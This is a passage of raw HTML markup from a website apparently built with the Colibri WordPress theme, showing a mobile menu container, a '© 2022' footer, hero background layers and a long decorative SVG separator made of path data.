h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path 